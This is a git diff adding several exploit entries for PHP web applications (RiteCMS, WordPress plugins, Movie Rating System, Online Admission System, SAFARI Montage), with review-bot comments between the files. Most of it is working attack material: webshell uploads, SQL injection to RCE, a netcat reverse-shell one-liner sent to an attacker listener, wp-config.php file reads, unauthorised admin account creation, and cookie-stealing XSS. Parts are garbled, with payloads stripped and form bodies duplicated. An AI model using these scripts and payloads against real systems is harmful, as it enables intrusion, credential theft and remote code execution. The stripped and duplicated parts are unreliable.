+-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="compression" + +80 +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="thumbnail_resize_xy" + +x +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="thumbnail_resize" + +150 +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="thumbnail_compression" + +70 +-----------------------------351719865731412638493510448298 +Content-Disposition: form-data; name="upload_file_submit" + +OK - Upload file +-----------------------------351719865731412638493510448298-- \ No newline at end of file diff --git a/exploits/php/webapps/50615.txt b/exploits/php/webapps/50615.txt new file mode 100644 index 000000000..d1eee420b --- /dev/null +++ b/exploits/php/webapps/50615.txt 
@@ -0,0 +1,53 @@ +# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated) +# Date: 25/07/2021 +# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) +# Vendor Homepage: https://ritecms.com/ +# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip +# Version: <= 3.1.0 +# Google Dork: intext:"Powered by RiteCMS" +# Tested on: Windows 10, Ubuntu 18, XAMPP +# Reference: https://gist.github.com/faisalfs10x/5514b3eaf0a108e27f45657955e539fd + + +################ +# Description # +################ + +# RiteCMS version 3.1.0 and below suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. + + +##################################################### +# PoC to delete secretConfig.conf file in web root # +##################################################### + + +Steps to Reproduce: + +1. Login as admin +2. Go to File Manager +3. Delete any file +4. Intercept the request and replace current file name to any files on the server via parameter "delete". 
+ +# Assumed there is a secretConfig.conf file in web root + +PoC: param delete - Deleting secretConfig.conf file in web root, so the payload will be "../secretConfig.conf" + +Request: +======== + +GET /ritecms.v3.1.0/admin.php?mode=filemanager&directory=media&delete=../secretConfig.conf&confirmed=true HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager +Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Sec-GPC: 1 \ No newline at end of file diff --git a/exploits/php/webapps/50616.txt b/exploits/php/webapps/50616.txt new file mode 100644 index 000000000..87b31e2c5 --- /dev/null +++ b/exploits/php/webapps/50616.txt 
@@ -0,0 +1,143 @@ +# Exploit Title: RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated) +# Date: 25/07/2021 +# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) +# Vendor Homepage: https://ritecms.com/ +# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip +# Version: <= 3.1.0 +# Tested on: Windows 10, Ubuntu 18, XAMPP +# Google Dork: intext:"Powered by RiteCMS" +# Reference: https://gist.github.com/faisalfs10x/bd12e9abefb0d44f020bf297a14a4597 + + +""" +################ +# Description # +################ + +# RiteCMS version 3.1.0 and below suffers from a remote code execution in admin panel. An authenticated attacker can upload a php file and bypass the .htacess configuration that deny execution of .php files in media and files directory by default. +# There are 4 ways of bypassing the current file upload protection to achieve remote code execution. + +# Method 1: Delete the .htaccess file in the media and files directory through the files manager module and then upload the php file - RCE achieved + +# Method 2: Rename .php file extension to .pHp or any except ".php", eg shell.pHp and upload the shell.pHp file - RCE achieved + +# Method 3: Chain with Arbitrary File Overwrite vulnerability by uploading .php file to web root because .php execution is allow in web root - RCE achieved +By default, attacker can only upload image in media and files directory only - Arbitrary File Overwrite vulnerability. 
+Intercept the request, modify file_name param and place this payload "../webrootExec.php" to upload the php file to web root + +body= Content-Disposition: form-data; name="file_name" +body= ../webrootExec.php + +So, webshell can be accessed in web root via http://localhost/ritecms.v3.1.0/webrootExec.php + +# Method 4: Upload new .htaccess to overwrite the old one with content like below for allowing access to one specific php file named "webshell.php" then upload PHP webshell.php - RCE achieved + +$ cat .htaccess + + +deny from all + + + + Allow from all + + + +################################### +# PoC for webshell using Method 2 # +################################### + +Steps to Reproduce: + +1. Login as admin +2. Go to Files Manager +3. Choose a directory to upload .php file either media or files directory. +4. Then, click Upload file > Browse.. +3. Upload .php file with extension of pHp, eg webshell.pHp - to bypass .htaccess +4. The webshell.pHp is available at http://localhost/ritecms.v3.1.0/media/webshell.pHp - if you choose media directory else switch to files directory + +Request: +======== + +POST /ritecms.v3.1.0/admin.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------410923806710384479662671954309 +Content-Length: 1744 +Origin: http://localhost +DNT: 1 +Connection: close +Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager&action=upload&directory=media +Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Sec-GPC: 1 + +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="mode" + 
+filemanager +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="file"; filename="webshell.pHp" +Content-Type: application/octet-stream + + +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="directory" + +media +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="file_name" + +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="upload_mode" + +1 +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="resize_xy" + +x +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="resize" + +640 +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="compression" + +80 +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="thumbnail_resize_xy" + +x +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="thumbnail_resize" + +150 +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="thumbnail_compression" + +70 +-----------------------------410923806710384479662671954309 +Content-Disposition: form-data; name="upload_file_submit" + +OK - Upload file +-----------------------------410923806710384479662671954309-- + + +#################### +# Webshell access: # +#################### + +# Webshell access via: +PoC: http://localhost/ritecms.v3.1.0/media/webshell.pHp?cmd=id + +# Output: +uid=33(www-data) gid=33(www-data) groups=33(www-data) + +""" \ No newline at end of file diff --git a/exploits/php/webapps/50617.txt b/exploits/php/webapps/50617.txt new file mode 100644 index 000000000..a4009f449 --- /dev/null +++ b/exploits/php/webapps/50617.txt 
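Review bot: The committed text has lost content to markup stripping: after `$ cat .htaccess` only `deny from all` and `Allow from all` remain with the container directives gone, and the `webshell.pHp` part of the PoC request has an empty body although `Content-Length: 1744` implies one, so Method 4 and the request cannot be followed as written and the file should be re-submitted from the gist in `# Reference:` rather than from a rendered copy. The whole description is also wrapped in `"""`, a Python string delimiter that has no meaning in a `.txt` advisory. On the defensive side the four methods appear to share one root cause the text could state in a sentence: the extension check and the `.htaccess` rule are apparently case-sensitive and the upload `file_name`/`directory` values are trusted, so case-insensitive extension matching plus path canonicalisation (and keeping `.htaccess` out of the file manager's deletable set) addresses all four.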
@@ -0,0 +1,84 @@ +# Exploit Title: WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated) +# Date: 22/12/2021 +# Exploit Author: gx1 +# Vulnerability Discovery: Gaetano Perrone +# Vendor Homepage: https://www.crmperks.com/ +# Software Link: https://wordpress.org/plugins/contact-form-entries/ +# Version: < 1.1.7 +# Tested on: any + +# References: + +* https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac +* https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/ + +# Description: +Contact Form Entries < 1.1.7 is vulnerable to Unauthenticated Stored Cross-Site Scripting + +# Technical Details and Exploitation: + +CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field. +When the user uploads a new form, CRM Form Entries checks for the client IP in order to save information about the user: +=============================================================================================================== +public function get_ip(), wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388 +============================================================================================================== +The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is stored inside the database. + + +# Proof Of Concept: + +Suppose that you have a Contact Form, intercept the POST request and insert the following Client-IP header +=============================================================================================================== +POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback HTTP/1.1 +Host: dsp.com:11080 +Content-Length: 1411 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ... 
+Client-IP: + +------WebKitFormBoundaryCuNGXLnhRsdglEAx + +Content-Disposition: form-data; name="_wpcf7" + +10 +------WebKitFormBoundaryCuNGXLnhRsdglEAx +Content-Disposition: form-data; name="_wpcf7_version" + +5.3.1 +------WebKitFormBoundaryCuNGXLnhRsdglEAx +Content-Disposition: form-data; name="_wpcf7_locale" + +en_US +------WebKitFormBoundaryCuNGXLnhRsdglEAx +Content-Disposition: form-data; name="_wpcf7_unit_tag" + +wpcf7-f10-p13-o1 +------WebKitFormBoundaryCuNGXLnhRsdglEAx +Content-Disposition: form-data; name="_wpcf7_container_post" + +Content-Disposition: form-data; name="_wpcf7" + +10 +------WebKitFormBoundaryCuNGXLnhRsdglEAx +Content-Disposition: form-data; name="_wpcf7_version" + +5.3.1 +------WebKitFormBoundaryCuNGXLnhRsdglEAx +Content-Disposition: form-data; name="_wpcf7_locale" + +en_US +------WebKitFormBoundaryCuNGXLnhRsdglEAx +Content-Disposition: form-data; name="_wpcf7_unit_tag" + +wpcf7-f10-p13-o1 +------WebKitFormBoundaryCuNGXLnhRsdglEAx +Content-Disposition: form-data; name="_wpcf7_container_post" +... +=============================================================================================================== +The request is acccepted, and the code navigates the section $_SERVER['HTTP_CLIENT_IP'] , ip is injected and saved inside the database. +When the administrator clicks on the entry element in the plugin, the XSS is triggered. + + +# Solution: +Upgrade Contact Form Entries to version 1.1.7 \ No newline at end of file diff --git a/exploits/php/webapps/50619.py b/exploits/php/webapps/50619.py new file mode 100755 index 000000000..e614ebe9c --- /dev/null +++ b/exploits/php/webapps/50619.py 
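Review bot: The `Client-IP:` header in the PoC request has an empty value — the payload was evidently stripped as markup on submission — and the multipart body from `_wpcf7` through `_wpcf7_container_post` is pasted twice, so the request as committed is neither complete nor consistent. The technical-details section would benefit from stating the trust boundary explicitly: `HTTP_CLIENT_IP` is a client-controlled request header that the cited `get_ip()` stores unchanged, and the stored value is apparently rendered to the administrator without output encoding, which is the point a fix has to address (presumably what 1.1.7 does; the text only says to upgrade). It is also worth noting that `Client-IP` stays client-supplied even behind a reverse proxy, so the proxy should overwrite or strip it rather than the plugin trusting it for the visitor's address.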
@@ -0,0 +1,86 @@ +# Exploit Title: WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection +# Date 22/12/2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://www.plugins-market.com/ +# Software Link: https://downloads.wordpress.org/plugin/wp-stats-manager.4.7.zip +# Version: <= 4.7 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2021-24750 +# CWE: CWE-89 +# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24750/README.md + +''' +Description: +The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action, +available to any authenticated user, which could allow users with a role as low as +subscriber to perform SQL injection attacks +''' + +# Banner: +banner = ''' + ___ _ _ ____ ___ ___ ___ __ ___ __ ___ ___ ___ + / __)( \/ )( ___)___(__ \ / _ \(__ \ / )___(__ \ /. |(__ )| __) / _ \ +( (__ \ / )__)(___)/ _/( (_) )/ _/ )((___)/ _/(_ _)/ / |__ \( (_) ) + \___) \/ (____) (____)\___/(____)(__) (____) (_)(_/ (___/ \___/ + + [+] WP Visitor Statistics SQL Injection + [@] Developed by Ron Jost (Hacker5preme) + +''' +print(banner) + +import argparse +import requests +from datetime import datetime + +# User-Input: +my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +my_parser.add_argument('-u', '--USERNAME', type=str) +my_parser.add_argument('-p', '--PASSWORD', type=str) +my_parser.add_argument('-C', '--COMMAND', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +wp_path = args.PATH +username = args.USERNAME +password = args.PASSWORD +command = args.COMMAND + +print('') +print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) +print('') + +# Authentication: +session = requests.Session() +auth_url = 'http://' + target_ip + ':' + target_port 
+ wp_path + 'wp-login.php' +check = session.get(auth_url) +# Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1' +} + +# Body: +body = { + 'log': username, + 'pwd': password, + 'wp-submit': 'Log In', + 'testcookie': '1' +} +auth = session.post(auth_url, headers=header, data=body) + +# Exploit: +exploit_url = 'http://' + target_ip + ':' + target_port + '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' + "' " + command + '"}' +exploit = session.get(exploit_url) +print(exploit.text) +print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S'))) \ No newline at end of file diff --git a/exploits/php/webapps/50621.py b/exploits/php/webapps/50621.py new file mode 100755 index 000000000..f760a1c9f --- /dev/null +++ b/exploits/php/webapps/50621.py 
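Review bot: `exploit_url` hard-codes `/wordpress/` while `auth_url` is built from the `-U/--PATH` argument, so the two requests go to different paths whenever `wp_path` is anything else; one of the two constructions is wrong. `import argparse`, `import requests` and `from datetime import datetime` sit after `print(banner)`, which PEP 8 reserves for the top of the module, and `check = session.get(auth_url)` is bound but never used. For defenders the script pins down the shape of the request: an `admin-ajax.php?action=refDetails` call whose `requests` JSON carries a quote inside `refUrl`, and the plugin-side fix is to bind `refUrl` as a query parameter rather than escape it ad hoc.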
@@ -0,0 +1,56 @@ +# Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated) +# Date: 22/12/2021 +# Exploit Author: Tagoletta (Tağmaç) +# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html +# Version: 1.0 +# Tested on: Windows + +import requests +import json + +url = input('Url:') +if not url.startswith('http://') and not url.startswith('https://'): + url = "http://" + url +if not url.endswith('/'): + url = url + "/" + +Username = "tago" +Password = "tagoletta" + +reqUrl = url + "classes/Users.php?f=save" + +reqHeaders = { + "Accept": "*/*", + "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac", + "X-Requested-With": "XMLHttpRequest", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", + "Origin": url} + +reqData = "------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nTago\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nLetta\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+Username+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"+Password+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n1\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryTagmac--\r\n" + +resp = requests.post(reqUrl, headers=reqHeaders, data=reqData) + +if resp.status_code == 200: + print("Admin account created") + reqUrl = url + "classes/Login.php?f=login" + + reqHeaders = { + "Content-Type": "application/x-www-form-urlencoded; 
charset=UTF-8", + "X-Requested-With": "XMLHttpRequest", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", + "Origin": url + } + + reqData = {"username": ""+Username+"", "password": ""+Password+""} + + resp = requests.post(reqUrl, headers=reqHeaders, data=reqData) + + data = json.loads(resp.text) + status = data["status"] + + if status == "success": + print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password) + else: + print("Exploited but not loginned") +else: + print("Not injectable") \ No newline at end of file diff --git a/exploits/php/webapps/50622.py b/exploits/php/webapps/50622.py new file mode 100755 index 000000000..50dae66fa --- /dev/null +++ b/exploits/php/webapps/50622.py 
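Review bot: `json.loads(resp.text)` and `data["status"]` are unguarded, so any non-JSON or differently shaped reply raises `JSONDecodeError`/`KeyError` instead of reaching the `else` branch, and the final `print("Not injectable")` mislabels what is an access-control failure, not an injection. `""+Username+""` is a no-op concatenation; `{"username": Username, "password": Password}` says the same. For defenders, the fixed `Username = "tago"` account created with `type` set to `1` is a usable indicator: an unexpected user row with that name, or any `classes/Users.php?f=save` request carrying `type=1` from an unauthenticated session, points at this weakness, and the server-side fix is to require an authenticated administrator before `f=save` creates or changes an account.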
@@ -0,0 +1,71 @@ +# Exploit Title: Movie Rating System 1.0 - SQLi to RCE (Unauthenticated) +# Date: 22/12/2021 +# Exploit Author: Tagoletta (Tağmaç) +# Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html +# Version: 1.0 +# Tested on: Ubuntu +# This exploit only works correctly if user is database administrator. if not user is database administrator, continue with sql injection payloads. + +import requests +import random +import string +from bs4 import BeautifulSoup + +url = input("TARGET = ") + +if not url.startswith('http://') and not url.startswith('https://'): + url = "http://" + url +if not url.endswith('/'): + url = url + "/" + +payload = "" + +let = string.ascii_lowercase +shellname = ''.join(random.choice(let) for i in range(15)) + +resp = requests.get(url) +htmlParser = BeautifulSoup(resp.text, 'html.parser') + +getMenu = htmlParser.findAll("a", {"class": "nav-link"}) +selectPage = "" +for i in getMenu: + if "movie" in i.text.lower(): + selectPage = i["href"] + break + +selectPage = selectPage.replace("./","") +findSql = url + selectPage +resp = requests.get(findSql) +htmlParser = BeautifulSoup(resp.text, 'html.parser') +movieList = htmlParser.findAll("a", {"class" : "card card-outline card-primary shadow rounded-0 movie-item text-decoration-none text-dark"}) + +sqlPage = movieList[0]["href"] +sqlPage = sqlPage.replace("./","") + +sqlPage = url + sqlPage + +print("\nFinding path") + +findPath = requests.get(sqlPage + '\'') +findPath = findPath.text[findPath.text.index("Warning: ")+17:findPath.text.index(" on line ")] +findPath = findPath[findPath.index("")+3:len(findPath)] +print("injection page: "+sqlPage) + +parser = findPath.split('\\') +parser.pop() +findPath = "" +for find in parser: + findPath += find + "/" + +print("\nFound Path : " + findPath) + +SQLtoRCE = "-1881' OR 1881=1881 LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -" +SQLtoRCE = 
SQLtoRCE.replace("#PATH#",findPath+shellname+".php") +SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex()) + +print("\n\nShell Uploading...") +status = requests.get(sqlPage+SQLtoRCE) + +shellOutput = requests.get(url+shellname+".php?tago=whoami") +print("\n\nShell Output : "+shellOutput.text) +print("\nShell Path : " + url+shellname+".php") \ No newline at end of file diff --git a/exploits/php/webapps/50623.py b/exploits/php/webapps/50623.py new file mode 100755 index 000000000..920b493af --- /dev/null +++ b/exploits/php/webapps/50623.py 
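Review bot: `findPath[findPath.index("")+3:len(findPath)]` always slices from offset 3 because `str.index("")` is 0; together with the empty `payload = ""` and the odd `"0x3"` prefix this reads like a listing whose angle-bracket content was stripped before commit, so the script as committed cannot do what its title says. `from bs4 import BeautifulSoup` is a third-party dependency the header does not mention; a `# Requires: beautifulsoup4` line would spare the next reader a failed import, and `movieList[0]` and `selectPage` are used without checking that anything was found, so a page without the expected `nav-link`/movie-item markup fails with `IndexError` rather than a message. On the defensive side, the `INTO OUTFILE` write in `SQLtoRCE` depends on the application's database account holding the FILE privilege and on `secure_file_priv` permitting writes into the web root, which the header's "only works correctly if user is database administrator" caveat should state explicitly — a least-privilege DB account and a restrictive `secure_file_priv` stop the RCE step even while the injection remains.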
@@ -0,0 +1,88 @@ +# Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 23/12/2021 +# Exploit Author: Jeremiasz Pluta +# Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System +# Software Link: https://github.com/rskoolrash/Online-Admission-System +# Tested on: LAMP Stack (Debian 10) + +#!/usr/bin/python +import sys +import re +import argparse +import requests +import time +import subprocess + +print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)') + +path = '/' #change me if the path to the /oas is in the root directory or another subdir + +class Exploit: + + def __init__(self, target_ip, target_port, localhost, localport): + self.target_ip = target_ip + self.target_port = target_port + self.localhost = localhost + self.localport = localport + + def exploitation(self): + payload = """""" + payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" + + url = 'http://' + target_ip + ':' + target_port + path + r = requests.Session() + + print('[*] Resolving URL...') + r1 = r.get(url + 'documents.php') + time.sleep(3) + + #Upload the payload file + print('[*] Uploading the webshell payload...') + files = { + 'fpic': ('cmd.php', payload + '\n', 'application/x-php'), + 'ftndoc': ('', '', 'application/octet-stream'), + 'ftcdoc': ('', '', 'application/octet-stream'), + 'fdmdoc': ('', '', 'application/octet-stream'), + 'ftcdoc': ('', '', 'application/octet-stream'), + 'fdcdoc': ('', '', 'application/octet-stream'), + 'fide': ('', '', 'application/octet-stream'), + 'fsig': ('', '', 'application/octet-stream'), + } + data = {'fpicup':'Submit Query'} + r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data) + time.sleep(3) + + print('[*] Setting up netcat listener...') + listener = subprocess.Popen(["nc", "-nvlp", self.localport]) + time.sleep(3) + + print('[*] Spawning reverse 
shell...') + print('[*] Watchout!') + r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2) + time.sleep(3) + + if (r3.status_code == 200): + print('[*] Got shell!') + while True: + listener.wait() + else: + print('[-] Something went wrong!') + listener.terminate() + +def get_args(): + parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)') + parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') + parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') + parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') + parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') + args = parser.parse_args() + return args + +args = get_args() +target_ip = args.url +target_port = args.target_port +localhost = args.localhost +localport = args.localport + +exp = Exploit(target_ip, target_port, localhost, localport) +exp.exploitation() \ No newline at end of file diff --git a/exploits/php/webapps/50624.py b/exploits/php/webapps/50624.py new file mode 100755 index 000000000..cd477114a --- /dev/null +++ b/exploits/php/webapps/50624.py 
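Review bot: The `files` dict literal lists the key `'ftcdoc'` twice, so the first entry is silently discarded — either one is a typo for another field name or it is dead. `Exploit.exploitation` reads the module globals `target_ip`, `target_port`, `localhost` and `localport` instead of the `self.*` attributes `__init__` stores, so the class only works when those globals happen to exist. The `#!/usr/bin/python` line sits after the header comments, where a shebang is ignored; `import sys` and `import re` are unused; and `payload = """"""` is empty, which with the declared `'application/x-php'` type suggests the upload content was stripped before commit. `while True: listener.wait()` spins forever once the child has exited, since `wait()` returns immediately for a finished process.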
@@ -0,0 +1,39 @@ +# Exploit Title: WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated) +# Date: 23/12/2021 +# Exploit Authors: Nicole Sheinin, Liad Levy +# Vendor Homepage: https://wordpress.org/plugins/seo-local-rank/ +# Software Link: https://plugins.svn.wordpress.org/seo-local-rank/tags/2.2.2/ +# Version: versions <= 2.2.2 +# Tested on: MacOS +# CVE: CVE-2021-39312 +# Github repo: + +#!/usr/bin/env python3 + +import argparse, textwrap +import requests +import sys + +parser = argparse.ArgumentParser(description="Exploit The True Ranker plugin - Read arbitrary files", formatter_class=argparse.RawTextHelpFormatter) +group_must = parser.add_argument_group('must arguments') +group_must.add_argument("-u","--url", help="WordPress Target URL (Example: http://127.0.0.1:8080)",required=True) +parser.add_argument("-p","--payload", help="Path to read [default] ../../../../../../../../../../wp-config.php", default="../../../../../../../../../../wp-config.php",required=False) + +args = parser.parse_args() + +if len(sys.argv) <= 2: + print (f"Exploit Usage: ./exploit.py -h [help] -u [url]") + sys.exit() + +HOST = args.url +PAYLOAD = args.payload + +url = "{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php".format(HOST) +payload = "/scripts/simple.php/{}".format(PAYLOAD) + + +r = requests.post(url,data={'src': payload}) +if r.status_code == 200: + print(r.text) +else: + print("No exploit found") \ No newline at end of file diff --git a/exploits/php/webapps/50625.txt b/exploits/php/webapps/50625.txt new file mode 100644 index 000000000..2cb1ffeaa --- /dev/null +++ b/exploits/php/webapps/50625.txt 
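Review bot: `#!/usr/bin/env python3` is on line 11, after the header comments, so it is not honoured as a shebang; `import argparse, textwrap` imports `textwrap` without using it and puts two modules on one line; and `print (f"Exploit Usage: ...")` is an f-string with no placeholders. The `len(sys.argv) <= 2` guard is redundant because `-u/--url` is already `required=True`, so argparse exits before it runs. The `# Github repo:` header is empty and `# Version: versions <= 2.2.2` repeats the word; drop the line if there is no repository. For the mitigation side, the traversal sits in the plugin's bundled datatables example script (`admin/vendor/datatables/examples/resources/examples.php` taking `src`), so removing vendored example and demo files from the deployed plugin is the relevant hardening alongside upgrading.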
@@ -0,0 +1,20 @@
+# Exploit Title: Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)
+# Google Dork: NA
+# Date: 03-OCT-2021
+# Exploit Author: Akash Rajendra Patil
+# Vendor Homepage: https://www.yahoobaba.net/project/library-system-in-php
+# Software Link: https://www.yahoobaba.net/project/library-system-in-php
+# Version: V 1.0
+# Tested on: WAMPP
+# Description #
+
+Library System in PHP V1.0 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitisation.
+
+# Proof of Concept (PoC) :
+#Exploit:
+1) Goto: http://localhost/library-system/dashboard.php
+2) Login as admin using test credentials: admin/admin
+3) Goto: http://localhost/library-system/update-publisher.php?pid=12
+4) Enter the following payload in the publisher field:
+5) Click on Save
+6) Our payload is fired and stored
\ No newline at end of file
diff --git a/exploits/php/webapps/50626.txt b/exploits/php/webapps/50626.txt
new file mode 100644
index 000000000..080a6653c
--- /dev/null
+++ b/exploits/php/webapps/50626.txt
@@ -0,0 +1,19 @@
+# Exploit Title: SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)
+# Date: 28/12/2021
+# Exploit Author: Momen Eldawakhly - Cyber Guy - (Resecurity Inc)
+# Vendor Homepage: https://www.safarimontage.com/
+# Version: 8.3 and 8.5
+# Tested on: Ubuntu Linux [Firefox]
+# CVE: CVE-2021-45425
+
+# Proof of Concept:
+
+GET /redirect.php?cmd=invalid%27%22()%26%25%3C/body%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&ret=3 HTTP/1.1
+Host: vulnIP
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=SSSION; lang=en
+Connection: close
\ No newline at end of file
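Review bot: Step 4 (`Enter the following payload in the publisher field:`) ends without the payload — it was evidently stripped as markup — so the PoC is not reproducible as committed; 50626.txt in the same chunk survived because its payload is percent-encoded in the request line. The header also carries placeholder values (`# Google Dork: NA`, `# Tested on: WAMPP`) and names no CVE or vendor fix. The description should say where the stored publisher name is rendered, since that output point, not the input form, is what needs encoding.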
diff --git a/exploits/php/webapps/50627.txt b/exploits/php/webapps/50627.txt
new file mode 100644
index 000000000..f4e314c06
--- /dev/null
+++ b/exploits/php/webapps/50627.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass
+# Date: 23/12/2021
